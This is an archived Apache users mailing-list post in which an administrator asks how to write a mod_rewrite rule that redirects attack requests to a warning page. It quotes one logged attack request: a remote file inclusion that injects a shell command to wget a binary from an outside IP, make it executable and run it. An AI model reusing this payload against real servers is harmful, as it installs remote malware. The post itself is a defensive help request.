[users@httpd] mod_rewrite problem

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

I have been having some problems with creating a RewriteRule using mod_rewrite.  I keep getting attacks that look like this:

GET /cache/index2.php?_REQUEST
[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|

Now Apache isn't allowing _REQUEST or GLOBALS, which is a good thing, but I would just as soon create a rule that will send them to a customized page warning of the potential repercussions of Hacking, and scare the begeezs out of the script kiddies.  I imagine that my rule would look something like this:

RewriteRule ^*.(php|cgi|rb|htm|html)? |(_(REQUEST|SERVER|COOKIE)[*]$ YouGo'n2Jail.html

Is this the correct syntax to get my desired result?  This being my first attempt at using rewrite, I haven't been able to get it working at all. 

The only way that I have seen RewriteRule deployed is in between <VirtualHost> elements.  Is this the only way to do it, or is there a way that you can do it server wide?  I have the module loaded, is there anything needed other then the rule and "RewriteEngine on"?

Thanks in advance for any help.
[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux